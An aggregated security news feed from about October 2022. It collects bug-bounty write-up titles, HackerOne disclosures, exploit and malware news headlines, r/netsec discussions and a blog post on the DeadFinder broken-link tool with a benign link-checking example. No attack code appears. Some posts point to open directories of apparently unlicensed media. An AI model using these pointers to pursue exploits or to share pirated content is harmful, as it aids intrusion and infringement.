    ‍$40,000 Bounty, Authentication Bypass Techniques, Cache Poisoning, IDORs, Password Recovery…
    No content preview
    TryHackMe WriteUp: Corridor
    No content preview
    TryHackMe: 0x41haz Room Write-Up [No Answer]
    No content preview
    Orange Arbitrary Command Execution
    No content preview
  • Open

    Impacket Impediments
    Good morning, Happy October! Here’s an extra-long 13Cubed episode for you, as well as an accompanying Impacket Exec Commands Cheat Sheet (see below). In this episode, we'll take a look at the five (5) Impacket exec commands: atexec.py, dcomexec.py, psexec.py, smbexec.py, and wmiexec.py. The goal is to understand what event log residue we should be looking for on the target system, both with standard "out-of-the-box" log configuration, and with additional configurations such as process auditing with command line. Episode: https://www.youtube.com/watch?v=UMogme3rDRA Impacket Exec Commands Cheat Sheet: https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    Released PS5 Kernel exploit and WebKit vulnerability for Firmware 4.03
    Article URL: https://wololo.net/2022/10/03/released-ps5-kernel-exploit-webkit-vulnerability-for-firmware-4-03/ Comments URL: https://news.ycombinator.com/item?id=33065419 Points: 2 # Comments: 0

  • Open

    PS5-4.03-Kernel-Exploit: An experimental webkit-based kernel exploit (Arbitrary R/W) for the PS5 on 4.03FW
    submitted by /u/sanitybit [link] [comments]
    BSides San Francisco 2022 Conference Recordings
    submitted by /u/sanitybit [link] [comments]
    spk aka spritzgebaeck: A small OSINT/Recon tool to find CIDRs that belong to a specific organization.
    submitted by /u/BananaBounty [link] [comments]
    Passkeys feat. Adam Langley [audio]
    submitted by /u/self [link] [comments]
    Dank: The greatest encoder you've never heard of
    submitted by /u/Quick-Ingenuity-7024 [link] [comments]
    GitHub - jafarlihi/rconn: rconn is a multiplatform program for creating generic reverse connections. Lets you consume services that are behind firewall or NAT without opening ports or port-forwarding.
    submitted by /u/jafarlihi [link] [comments]
    Censys CTF - WriteUp
    submitted by /u/TechbrunchFR [link] [comments]
    An updated list of PoC's CVE's
    submitted by /u/DevOpsMuffin39 [link] [comments]
    Phishing With Chromium's Application Mode
    submitted by /u/CyberMasterV [link] [comments]
    What I learnt from reading 126 Information Disclosure bug reports/writeups.
    submitted by /u/_nynan [link] [comments]
  • Open

    Safety of unknown external drive
    Hello, I apologize if this is not the correct subreddit. I recently found a Western Digital 1TB external drive for $4 at a second-hand store. It appeared to be NIB. It wasn't in plastic wrap, but it did have a sticker taping it shut. I popped it open and confirmed the drive looks OEM (i.e., there's no obvious USB RubberDucky in place of the hard drive). I hooked it up to a newly flashed air-gapped Raspberry Pi, deleted the partition, created a new partition, and formatted it. Am I being overly paranoid? Is it reasonable to assume the drive is safe to use? Thank you! submitted by /u/fkitnewy [link] [comments]
  • Open

    Bug Bounty: Hunting Open Redirect Vulnerabilities For $$$
    Image Source: BePractical Continue reading on Medium »
    Gcash Vulnerability Walkthrough
    Advisory: Update your Gcash Application now to the latest version. Continue reading on Medium »
    IDOR in GraphQL Query Leaking Private Photos of a Million $ App
    Introduction To GraphQL Continue reading on Medium »
    Breaking Business Logic - Part: 2^7 = 1
    Hello Hunters & Ninjas, this article has been published in a very short span of time because I'm a very consistent person in writing blogs as… Continue reading on Medium »
  • Open

    SecWiki News 2022-10-02 Review
    No news updates today. For more recent articles, visit SecWiki
  • Open

    Lazarus abuses a Dell driver vulnerability to deploy the FudModule rootkit
    Researchers found that the notorious North Korean hacking group Lazarus has deployed a new Windows rootkit; the malware exploits a vulnerability in a Dell driver.
  • Open

    SPY NEWS: 2022 — Week 39
    Summary of the espionage-related news stories for the Week 39 (25 September-1 October) of 2022. Continue reading on Medium »
  • Open

    X
    This year I saw the trailer for X and Stephen King tweeting about how much he loved this A24 film, so I knew there was little chance of me… Continue reading on Medium »

  • Open

    How I found an IDOR Worth $1500
    Hello, today I am talking about the bug I recently found in one of biggest companies in the world. Continue reading on Medium »
    Hats referral program: $1000 USDC reward for contributors who refer…
    The Hats Protocol offers different tools that align incentives between hackers and protocols to increase security in Web3. The… Continue reading on Medium »
    Tale of Easy P1 Bugs in Wild
    So after a long time, I got back on Bugcrowd where I had a private program, so I looked at the scope; it was a wildcard (*.redicated.com) scope. I… Continue reading on Medium »
    Cloud Enumeration Series: Discovering Azure Websites using ffuf
    As part of my Azure Cloud Enumeration process, I like to make use of the web fuzzing tool ffuf to fuzz azurewebsites.net for subdomains… Continue reading on Medium »
    G-map API KEY Exploitation
    Hey folks,today I am sharing about gmap api key exploitation. Continue reading on Medium »
    Open Redirect in Ind**mart
    Hey folks, today I came with an open redirect vulnerability bug. Continue reading on Medium »

    Attending conferences and talks solo?
    Hello! Mid-level here, cloud security, recently switched companies. My new role is fully remote and the company is in a different country. The work itself, salary, and learning opportunities are good, but I really started to miss face to face interaction with like-minded individuals and would like to boost my network a bit if I wanted to switch roles again. Thought about attending conferences and tech meetups in my area (I'm EU-based) and maybe a big one abroad if I really enjoy it, like Defcon. The problem is, except for one vendor event for partners in my previous company I've never been to such events (and this one was basically a giant sales pitch where everyone was waiting for it to finish and down all the free booze. The colleagues from my previous company have warned me all the conferences are this way. Is it true btw?) I'm afraid I will feel super weird and stick out like a sore thumb or just listen to the talks and not talk to anybody. How do you successfully network / get to know the people at those types of events? Especially the big ones? Just approaching someone after a talk and saying it was great seems weird to me, he must have gotten 100s of those. How about all the other people? Should I somehow connect with people way before the conferences (idk, linkedin?) and then just offer them to meetup at those? What's the best strategy? Do people who work remotely even go to those types of events or were my coworkers from my previous company right and people just use it as a company-sponsored party with some talks thrown in and no one goes there on their own? Thank you for all the insights! submitted by /u/nanji909 [link] [comments]
    Automatic tools for finding SQLi
    sqlmap is a super tool for exploration. However, we need to give it an injection point. What are the best tools you recommend to automatically find injection points? What I know is Netsparker, Acunetix, Burp Scanner. Maybe you can recommend something else? submitted by /u/mobo2015 [link] [comments]
    Compliance professional leading IT Audit, Security reviews 10+ years, thinking of transitioning to Data Privacy field. What’s your take on this partner industry?
    NT but happy to help address questions about what I do, specifically. Personally I think the data privacy/data protection field is a growing one and VERY important. I also don’t have a Law background but my feeling is that people from the IT Security, IT Audit, Compliance, etc. industries will do well in the Privacy field and there is space for us. submitted by /u/nichijouuuu [link] [comments]
    Would security be easier if there were 2^32 ports instead of 2^16?
    Special port usage is countered by scanning, but if scanning wasn't so arbitrarily limited, would it be easier to secure transmission via obscurity? submitted by /u/oldschool_anime [link] [comments]
    Smart bulb / Gosund
    I recently installed a smart bulb that needed to connect to wifi and the app they had me use (Gosund) asked me for my wifi pass. I submitted it but got spooked later and uninstalled the app and changed my wifi pass. Is my network still compromised? submitted by /u/fyenfi [link] [comments]

    Report on Secure Compilation
    submitted by /u/0x414141 [link] [comments]
    Tillitis - Open Source USB security key inspired by measured boot and DICE
    submitted by /u/0x414141 [link] [comments]
    Analyzing BSD Kernels for Uninitialized Memory Disclosures using Binary Ninja
    submitted by /u/0x414141 [link] [comments]
    HTTPT: A Probe-Resistant Proxy
    submitted by /u/0x414141 [link] [comments]
    pizauth, an OAuth2 token requester daemon
    submitted by /u/0x414141 [link] [comments]
    Wiresocks for easy proxied routing
    submitted by /u/sanitybit [link] [comments]
    Emulate Shellcode with Radare2
    submitted by /u/sanitybit [link] [comments]
    /r/netsec's Q4 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines One post per company; it may contain multiple open positions. Please do not use multiple comments to post multiple positions, as the additional comments will be removed. Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/sanitybit [link] [comments]

    Is there a Google parameter to stipulate only up addresses, no domains?
    Yikes sorry I meant IP not UP. Lol autocorrect. submitted by /u/AndrewZabar [link] [comments]

    SecWiki News 2022-10-01 Review
    No news updated today. For more of the latest articles, visit SecWiki

    Cyber Security-Red Team Operations Chapter-1 (Wifi Hacking)
    Read this article in Turkish Continue reading on Medium »

    How Kalibr missiles could determine the outcome of the Ukraine war
    Putin’s favourite cruise missiles have an uncertain future. It could save the lives of many civilians Continue reading on Medium »
    Why Kalibr missiles could decide the Ukraine war
    Putin's preferred cruise missiles have an uncertain future. That could save the lives of many civilians Continue reading on Medium »
    Collection Useful Link for OSINT and Threat Hunting
    These resources will continually be updated and collected from various sources (The latest update was 1/10/2022). Continue reading on Medium »

    TryHackMe: Corridor Room Write-Up [No Answer]
    No content preview
    Security vs Compliance-Cloudflare Password Policy Restriction Bypass
    No content preview
    CVE-2022–35405: Critical ManageEngine RCE
    No content preview

    Revisiting WebSocket memory shells (memory shell series, part 8)
    Next we need to study a kind of memory shell built on top of it: the implementation of the tomcat-websocket memory shell.

    College Degree with LE and certs
    Hey y’all, I appreciate you taking the time to read this. I’m currently a law enforcement officer and digital forensic examiner in south Florida. I attended college, and obtained a lot of credits but never finished a degree program. I am now looking to get a degree in Cybersecurity and or Digital Forensics. Does anyone know of any universities that offer self paced online courses and that will offer a large amount of credits for law enforcement/digital forensic certifications? I know of WGU and Champlain. I am open to obtaining an associate’s prior to a bachelor’s program if needed. Have a great weekend! submitted by /u/jaguars0208 [link] [comments]

    Generated passwords are not fully validated by HIBPValidator
    Nextcloud disclosed a bug submitted by bjoernv: https://hackerone.com/reports/1606961 - Bounty: $100

    Nord Stream Attacks Expose Vulnerability of EU Infrastructure
    Article URL: https://www.spiegel.de/politik/deutschland/nord-stream-anschlag-operation-seebeben-a-2525d727-a892-4781-89b7-34cd5d1ecae3 Comments URL: https://news.ycombinator.com/item?id=33043741 Points: 1 # Comments: 0

    Third party agents for Havoc C2
    submitted by /u/CodeXTF2 [link] [comments]


    Welcome Angle Protocol!
    We are very excited to welcome Angle Protocol to the Hats ecosystem! We hope to help them add a layer of… Continue reading on Medium »
    Distributed Bruteforcing of DNS records
    Using shuffleDNS/pureDNS + BBRF + Axiom Continue reading on Bug Bounty »
    How I Bypassed Signup OTP with developer’s fault!
    Hi everyone, I’m Rawaz. In this first write-up, I’ll show you how I bypassed OTP on a signup page. Continue reading on Medium »
    How I found the “No Rate Limit” on multiple websites
    Hello everyone! I’m Nitish, hope you all are doing great. In this, I will share how I found “No Rate Limit” on many public websites and a… Continue reading on Medium »
    Source code scanner for Finding Critical Vulnerabilities
    Source code analysis is one of the most thorough methods available for auditing software. It is also one of the most expensive, but it… Continue reading on Medium »
    Netscrapper.py, Powerful network auditing tool
    Introduction Continue reading on Medium »
    How I made 200$ in 5 minutes by email injection. First Bug Bounty
    Recently I was hunting on a private program. It had very less functionality and just had its marketing site with admin and an API as its… Continue reading on Medium »
    CLICKJACKING (UI redressing)
    Let us know in detail…. Continue reading on Medium »
    Security vs Compliance-Cloudflare Password Policy Restriction Bypass
    After a small break on bug bounty, I started hunting on the Cloudflare Bug Bounty program. This write-up is about the Password Policy… Continue reading on Medium »

    H4CK1NG G00GL3 - Security challenges
    submitted by /u/foxTN [link] [comments]
    VNCERT/CC has just developed a tool to check Exchange's 0-day exploit http request blocking. #exchange #0day #exploit #vncertcc
    submitted by /u/InterestingEmu4225 [link] [comments]
    What I learnt from reading 220 IDOR bug reports.
    submitted by /u/_nynan [link] [comments]
    Detecting Mimikatz with Busylight
    submitted by /u/digicat [link] [comments]
    Arbitrary cache poisoning on all Akamai websites via 'Connection: Content-Length'
    submitted by /u/albinowax [link] [comments]

    Bypassing authorization of linked Instagram account
    TikTok disclosed a bug submitted by ckerha: https://hackerone.com/reports/1199965 - Bounty: $170
    Open Redirect on www.redditinc.com via `failed` query param bypass after fixed bug #1257753
    Reddit disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1285081 - Bounty: $200
    IDOR allows an attacker to modify the links of any user
    Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1661113 - Bounty: $5000
    Unrestricted File Upload on reddit.secure.force.com
    Reddit disclosed a bug submitted by heckintosh: https://hackerone.com/reports/1606957 - Bounty: $100
    Lack of Packet Sanitation in Goflow Results in Multiple DoS Attack Vectors and Bugs
    Cloudflare Public Bug Bounty disclosed a bug submitted by path_network: https://hackerone.com/reports/1636320 - Bounty: $500
    Password Policy Restriction Bypass
    Cloudflare Public Bug Bounty disclosed a bug submitted by lohigowda: https://hackerone.com/reports/1675730 - Bounty: $250

    What is an effective way to document and plan an internal company pentest?
    I have been tasked to plan a pentest for our company for web app and infrastructure. We have about 15 projects that need to be done. Currently, we document, schedule, scope it out and put it in Confluence for the stakeholders to see. I feel like this may not be an optimal way (or maybe not) as there is no way to aggregate data effectively and it is harder to enforce standardisation as it's not a fixed form etc. A better way would be to use a CRM, but this may be overkill as it's only 15 pentests a year, which is manageable with our current system. What are other ways to effectively plan and schedule a pentest such that there is a central platform to get the quotes, scopes, reports, etc.? In the past we used to have Monday and Float which were used more for scheduling someone on a job or task. We also used Salesforce as the CRM of choice to see the email flow and quotes better. I feel like this may make more sense for a consultancy where they have to deal with a number of projects and different clients every day. submitted by /u/VertigoRoll [link] [comments]
    [Need advice] Addressing cyber security at a startup
    Hi folks, cyber security is a sea and as a startup it is difficult to decide where to start. What would be your advice for a tech startup for addressing cyber security? At what stage and where do you start? What all should be addressed as you scale? Is there a phased approach to it? submitted by /u/xharpo [link] [comments]
    How to Portscan Local Network with VPS/EC2?
    I wanted to scan my local, private network (10.0.x.x) but my own hardware (tried WSL + VM) had issues and cannot seem to run masscan at all or Nmap at a competent rate. As a result, for my last-ditch effort I was considering using a VPS or a free-tier EC2 to somehow tunnel into my local network and scan the current local network that my computer is on. Is this the best option or are there better ways to scan just my local network? There will be no outbound traffic to websites. Thank you! submitted by /u/No_Student_3535 [link] [comments]
    Need someone with WireShark knowledge to help me with a few tasks
    Hi, in school we are starting to use a program called Wireshark which I'm sure most of you are familiar with. I’m looking for someone who is knowledgeable in Wireshark to help me understand it because my teacher didn’t do a good job. All I need is someone to answer a few questions for me about it. PM me if you can help submitted by /u/Sxeem [link] [comments]

    Training
    I am looking for red and blue team training, any trainer who can train me technically, hands-on. submitted by /u/mcllisms [link] [comments]
    Microsoft has detected social engineering campaigns targeting employees of orgs across industries in the US, UK, India, Russia. MSTIC attributes the campaigns to North Korea-based actor ZINC, which used multiple weaponized open-source software.
    submitted by /u/SCI_Rusher [link] [comments]
    cvet: Python utility for pulling actionable vulnerabilities from cvetrends.com
    submitted by /u/thricethagr8est [link] [comments]
    PoC CVE's Updated List
    submitted by /u/DevOpsMuffin39 [link] [comments]

    Hacking Butler
    In this blog, I am going to walk you through the box “BUTLER”. It’s fairly easy to hack. So, we will be following a simple penetration… Continue reading on Medium »
    The Orbital Diaries: Part 1.
    A few months ago, security researcher mrd0x published a series of bypasses and disruptions that a local attacker could perform… Continue reading on Red Squadron »

    COMTRADE: Using Trade Data to Uncover Fraud and Smuggling
    Trade information collected by the United Nations was key to uncovering Big Tobacco’s role in oversupplying cigarettes to a West African… Continue reading on OCCRP: Unreported »
    You may be sharing too much information and not even know it
    Today’s threat actors make use of a variety of information to tailor their attacks against organizations and individuals. By collecting… Continue reading on Hunter Strategy »
    quiztime Challenge(#8)
    Hi, I’m Walnut. Today I share the results of my quiz attempt on quiztime tweets. The quiz will be a photo on Twitter. Our goal is to find… Continue reading on Medium »

    SecWiki News 2022-09-30 Review
    An introduction to entity-relation prediction for software security, by ourren; A deep-learning-based statement-level defect prediction method, by ourren; Five different authentication bypass techniques, by 蓝色淡风. For more of the latest articles, visit SecWiki

    LiME vs AVML for linux memory acquisition
    Hi, one problem I have with LiME is that I need to compile the kernel module for the target machine. This becomes a big headache many times, especially with custom kernels. I just found out about AVML, which doesn't even use a kernel module, it seems, and is not dependent on the target machine. Now I haven't used it much, but wanted to ask the experts here: is there any drawback in using AVML? Considering that it is not dependent on the target kernel, why isn't everyone using this instead of LiME? Basically what I'm asking here is, what do the Linux forensics experts use to acquire a Linux memory dump that is compatible with Volatility, and we don't care whether it supports Android or not? LiME or AVML or something even better? submitted by /u/Ro0o0otkit [link] [comments]
    How to get plaso to run faster?
    Does anyone know of a way to get plaso/psort to run faster (e.g. is there a way to add additional threads?). I applied a filter (https://github.com/mark-hallman/plaso_filters/blob/master/filter_windows.txt) when creating the dump file and did a time slice of two weeks, but a 60gb dump file is taking 14+ hours. Let me know what you think. Thank you, DBR submitted by /u/DeadBirdRugby [link] [comments]

    [Vulnerability Advisory] Microsoft Exchange Server SSRF & RCE vulnerabilities (CVE-2022-4104...
    Recently, the BaiMaoHui Security Research Institute (白帽汇安全研究院) observed that Microsoft fixed a server-side request forgery (SSRF) vulnerability (CVE-2022-41040) and a remote code execution (RCE) vulnerability (CVE-2022-41082); CVE-2022-4104...

    PoC CVE's Updated List
    Article URL: https://github.com/tg12/PoC_CVEs Comments URL: https://news.ycombinator.com/item?id=33033286 Points: 1 # Comments: 0

    Broken link를 찾자! DeadFinder
    I recently built a tool to make it easy to find broken links (dead links). The goal was to find the broken links on my own blog, but I thought it would be worth sharing at least briefly, so I am writing it up as a blog post. It is DeadFinder :D
    Broken Link
    A broken link, also called a dead link, is a link on a web page that can no longer be reached. Basically these are the web links referenced from various elements, from the href of a tags to script src. Such broken links hurt SEO (Search Engine Optimization) and, depending on the domain they point to, can also cause security problems. When users click a link they consider not only the address but also the trustworthiness of that page. If someone takes over a broken link, it can be used in attacks that abuse the trust placed in the service.
    Deadfinder
    deadfinder is a tool that identifies and tests the links in web pages to find broken links.
    https://github.com/hahwul/deadfinder
    https://rubygems.org/gems/deadfinder
    Installation
    # Install with Gem
    gem install deadfinder
    # Run on Docker
    docker pull ghcr.io/hahwul/deadfinder:latest
    Usage
    Modes
    Four modes are currently supported. The role of each mode is as follows.
    url: scans a single URL. Example: deadfinder url https://www.hahwul.com
    sitemap: parses a sitemap and scans the URLs it contains. Example: deadfinder sitemap https://www.hahwul.com/sitemap.xml
    file: reads a file containing a list of URLs and scans them. Example: deadfinder file urls.txt
    pipe: reads URLs from STDIN and scans them. Example: cat...
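    As an added example (not DeadFinder's own code, which is Ruby and lives at the GitHub link above), the Python sketch below shows the two halves of the dead-link check the post describes: pulling link targets out of href/src attributes and resolving them against the page URL, then classifying each target. It goes one step past the post by separating a link whose host no longer resolves (the takeover case the post warns about, since an unregistered domain can be registered by anyone) from a link whose host is up but answers with an error. The HTML page, the DNS table and the HTTP status table are constructed inline under hypothetical hostnames so that it runs offline; a real run would pass socket.gethostbyname and an HTTP HEAD request in place of the two injected callbacks.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LinkExtractor(HTMLParser):
    """Collects absolute http(s) targets from attributes that load or link to other resources."""

    ATTR_BY_TAG = {"a": "href", "link": "href", "script": "src", "img": "src", "iframe": "src"}

    def __init__(self, base_url: str):
        super().__init__()
        self.base_url = base_url
        self.links = []

    def handle_starttag(self, tag, attrs):
        wanted = self.ATTR_BY_TAG.get(tag)
        if not wanted:
            return
        for name, value in attrs:
            if name == wanted and value:
                absolute = urljoin(self.base_url, value.strip())
                # mailto:, tel:, javascript: and similar targets are not fetchable links
                if urlsplit(absolute).scheme in ("http", "https"):
                    self.links.append(absolute)


def classify(url: str, resolve, fetch_status) -> str:
    """
    ok       - host resolves and the resource answers with a status below 400
    dead     - host resolves but the resource answers 4xx/5xx
    dangling - host does not resolve at all; if the domain is unregistered, anyone
               can register it and serve content under a link the page still vouches for
    """
    host = urlsplit(url).hostname
    if not host or not resolve(host):
        return "dangling"
    return "ok" if fetch_status(url) < 400 else "dead"


def find_broken_links(base_url: str, html: str, resolve, fetch_status) -> dict:
    parser = LinkExtractor(base_url)
    parser.feed(html)
    # dict.fromkeys de-duplicates while keeping first-seen order
    return {link: classify(link, resolve, fetch_status) for link in dict.fromkeys(parser.links)}


# Constructed sample page and lookup tables (hypothetical hosts; nothing is fetched).
SAMPLE_BASE = "https://www.example.com/blog/post"
SAMPLE_HTML = """
<html><body>
<a href="/about">About</a>
<a href="../about">About (relative form of the same link)</a>
<script src="https://cdn.example.net/lib/app.js"></script>
<img src="//cdn.example.net/logo.png">
<a href="https://old-partner.example.org/tool">Partner tool</a>
<a href="mailto:webmaster@example.com">Contact</a>
</body></html>
"""
SAMPLE_DNS = {"www.example.com": True, "cdn.example.net": True, "old-partner.example.org": False}
SAMPLE_HTTP = {
    "https://www.example.com/about": 200,
    "https://cdn.example.net/lib/app.js": 404,
    "https://cdn.example.net/logo.png": 200,
}


def sample_resolve(host: str) -> bool:
    """Stand-in for a DNS lookup (socket.gethostbyname in a real run)."""
    return SAMPLE_DNS.get(host, False)


def sample_fetch_status(url: str) -> int:
    """Stand-in for an HTTP HEAD request that returns the status code."""
    return SAMPLE_HTTP.get(url, 404)


def sample_report() -> dict:
    return find_broken_links(SAMPLE_BASE, SAMPLE_HTML, sample_resolve, sample_fetch_status)


if __name__ == "__main__":
    for link, verdict in sample_report().items():
        print(f"{verdict:9} {link}")
```

    The verdicts are worth keeping apart in a real scan: a "dead" link is an SEO and usability problem, while a "dangling" one is the case to check in a registrar before an attacker does.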

    "Deadly" ad pop-ups
    The car's center console, which should be keeping drivers safe, may become a potential road killer because of ad pop-ups.
    FreeBuf Weekly | Putin formally grants Snowden Russian citizenship; ransomware groups are weaponizing open-source software
    We have summarized and recommended this week's hot news, security incidents, good reads and handy tools, so that nobody misses any of this week's highlights!
    Twist? NSA employee leaks secrets to a foreign agent who turns out to be an undercover FBI agent
    The employee sent excerpts of stolen classified information to an undercover FBI agent posing as a foreign operative.
    CyberBattleSim (automated internal network penetration): research and analysis
    CyberBattleSim is an AI attack-and-defense simulation tool open-sourced by the Microsoft 365 Defender team, originating from an experimental Microsoft research project.
    To get rehired, a fired employee hacked the company network
    Reportedly, the fired employee did this to get his former company to rehire him at a higher salary.
    65% of companies are considering VPN alternatives
    A VPN risk report shows that attackers continue to exploit long-standing security vulnerabilities, increasing attacks against VPNs.
    Microsoft: ransomware groups are weaponizing open-source software
    Microsoft says a ransomware group is trojanizing legitimate open-source software and using it to backdoor organizations in many industries, including technology, defense, and media and entertainment.


    Infosec Encyclopedia
    Hello Bug Hunters 👋🏼 Continue reading on Medium »
    Orange Arbitrary Command Execution
    Hi everybody Omar Hashem is here, I will share with you how I was able to achieve more than 10 RCE in different companies using the same… Continue reading on Medium »
    How I got a $3000 bounty in 3 min.
    Hi all, Continue reading on Medium »
    Worldwide Server-side Cache Poisoning on All Akamai Edge Nodes ($50K+ Bounty Earned)
    Introduction And Context Continue reading on Medium »
    How to get an Internship In Cybersecurity/Ethical Hacking
    A complete guide to getting an internship for cybersecurity student Continue reading on InfoSec Write-ups »
    Shodan Dorks - The God’s Eye
    Summary : Continue reading on Medium »
    Aurora Improper Input Sanitization Bugfix Review
    Summary Continue reading on Immunefi »
    HTTRACK — MAKE ANY WEBSITE OFFLINE
    Hello, back again with me; in this post we will try to do something interesting. Here I will show… Continue reading on Medium »
    Friendship with Google : Dorks
    Taking help from our friend Google for recon or information gathering. Continue reading on Medium »
    OAuth 2.0 Hacking
    OAuth is an open authorization protocol, which allows accessing the resources of the resource owner by enabling the client applications on… Continue reading on Medium »

    Open Redirect
    Flickr disclosed a bug submitted by stevejubs: https://hackerone.com/reports/1581258 - Bounty: $258
    no rate limit in forgot password session
    Yelp disclosed a bug submitted by irfadps: https://hackerone.com/reports/1714970
    XSS in Widget Review Form Preview in settings
    Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1595905 - Bounty: $500

    0-Day RCE Vulnerability Against Microsoft Exchange Servers
    Article URL: https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html Comments URL: https://news.ycombinator.com/item?id=33027247 Points: 4 # Comments: 0

    Found this obfuscated script on my website, anybody can help me deobfuscate it?
    Link: https://hastebin.com/abudolibep.php submitted by /u/xmrchaos [link] [comments]
    Certification Holders Who Can’t Utilize - HITRUST CCSFP/QSA
    I was curious how many people were out there who hold cyber/privacy related certifications but no longer work for an organization who can sponsor them, thus, unable to leverage them any longer in an official capacity / lose them all together. I feel like with the heavy turnover recently there must be a decent population impacted. Maybe I’m wrong but thought this was a good place to ask! submitted by /u/R1skM4tr1x [link] [comments]
    Could Using IE Mode in Edge Violate Acceptable Use?
    This is nowhere near my area of expertise so I wanted to get some more opinions. Within my company's acceptable use policy "Purposely avoiding or deactivating security measures" is listed as prohibited use. We use an external website which was just modified to "work" on edge. It tries to use setRequestHeader for cookie and accept-encoding. In order for it work it must be loaded in IE mode. Since IE mode is, by default, less secure than edge itself, this violates acceptable use as written does it not? submitted by /u/XXXCEDRIN_PM [link] [comments]

    New attack campaign utilized a new 0-day RCE vulnerability on Microsoft Exchange Server
    submitted by /u/CyberMasterV [link] [comments]
    GitHub - swanandx/lemmeknow: The fastest way to identify anything! Blazingly Fast alternative to PyWhat made with Rust.
    submitted by /u/swanandx [link] [comments]

    Day 97 / 100 & OSCP
    Day 97 was full of some more Windows API in C++. I worked on ”thenet” project and threw together a dropper in C#. What I wanted to do was… Continue reading on Medium »

    Chrome 107 Beta
    The Chrome beta post will now be posted to the Chrome Developers site. Find the release notes for Chrome Beta 107 here.

    Mounting an AD1 custom content image
    I’m learning about custom content images with FTK Imager. I am able to create one and add it as evidence in FTK Imager. I can view the files there. However, when I try to mount it, it does not mount correctly. It shows up as a drive in This PC, but I cannot browse to any files. Additionally, I tried browsing to it using an administrator PowerShell console and could not do so. This occurs regardless of whether the AD1 image is mounted with FTK Imager or OSFMount. Am I creating the AD1 image incorrectly, or is it just impossible to mount them for some reason? Thanks in advance! submitted by /u/Gizando [link] [comments]

    SecWiki News 2022-09-29 Review
    Special analysis of customized attacks against the VMware cloud virtualization platform, by ourren; Cloud security trends (end of 2022), by ourren. For more of the latest articles, visit SecWiki

    WordPress Vulnerability & Patch Roundup September 2022
    Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. The vulnerabilities listed below are virtually patched by the Sucuri Firewall and existing clients are protected. Continue reading WordPress Vulnerability & Patch Roundup September 2022 at Sucuri Blog.

    Blockchain Network is Secured! But not the apps and their Integrations
    No content preview
    Try Hack Me: Simple CTF Walkthrough
    No content preview
    Understanding the NMAP methodology — Part 3
    No content preview

    assortment of media
    Music, movies, and TV shows. Server is hosted in France, but spot check of the content came back as English. http://90.66.48.191/media/ submitted by /u/dasheswithdots [link] [comments]
    Lots of books in PDF format. Including kids books
    submitted by /u/cdtoad [link] [comments]

    Ziion: Discovery of this New Kali Linux for Blockchain Security
    submitted by /u/pat_ventuzelo [link] [comments]

    Hardening Backups Against Ransomware
    Human-operated ransomware represents a unique challenge to backup infrastructures. Unlike in other scenarios, ransomware attackers specifically target and attempt to destroy backup systems to increase the likelihood that a victimized organization will pay the ransom. This threat requires a different approach to securing backup infrastructure. The Old Ways Are Not Enough Traditionally, enterprise backup infrastructures... The post Hardening Backups Against Ransomware appeared first on TrustedSec.

    How to build an in-house penetration testing program | FreeBuf enterprise (Party A) group discussion
    How should an in-house (Party A) enterprise do penetration testing, and how does it differ from a vendor (Party B)?
    An overview of smart-vehicle cybersecurity policies and regulations
    With a sound legal system as the basis, solidly build the foundation of cybersecurity and lay the groundwork for smart vehicles to take off.
    FreeBuf Morning Report | Woman playing "Sheep a Sheep" scammed out of 90,000 yuan; Cyberspace Administration of China deepens online rumor-debunking labeling work
    Recently, a Ms. Yan from Changzhou, while playing the game "Sheep a Sheep", watched an ad to get items, fell into a loan trap, and was scammed out of 90,000 yuan.
    Red team skills: social engineering
    Simply put, social engineering is the act of an attacker exploiting human weaknesses to gain your trust and thereby obtain information.
    National standard "Information Security Technology: Guidelines for Cybersecurity Information Reporting (Draft for Comment)" released
    The Reporting Guidelines describe the information types, elements and format specifications for cybersecurity information reporting, as well as the participating roles, basic process and reporting methods of reporting activities.
    "Cybersecurity Standards Practice Guide: Health Code Anti-Counterfeiting Technical Guide" released
    The Practice Guide gives technical guidance on health-code anti-counterfeiting in on-site verification scenarios, guiding technical providers of health-code services to improve anti-counterfeiting capability and overall security.
    Meta shuts down a large-scale Russian fake news "network"
    The network was used to publish disinformation on more than 60 websites across Europe that impersonated news organizations.
    Notes on an internal network range penetration test
    Programmer Xiaoxing has been studying internal network penetration and tested some internal network ranges, so I want to share my experience attacking internal ranges from three aspects: the testing process, the detection process, and the domain penetration process.

    OSINT research can leave any of us traumatised
    A day like any other. A new video on my Twitter feed. Then I started having nightmares. Continue reading on Medium »


    A breach on Patreon, and their elusive bounty program.
    Introduction. Continue reading on Medium »

    Will a jwks always be hosted at /.well-known/jwks.json?
    I'm trying to generate my own JWTs but I'm struggling to find where I need to host the jwks file. I assume it's supposed to be at /.well-known/jwks.json, but it appears that some oidc providers will provide a discovery endpoint at /.well-known/openid-configuration and host the file elsewhere. What's standard practice? Do clients have a pre-defined way of figuring out where the JWKs is given the issuer url? submitted by /u/Pumpkin-Main [link] [comments]
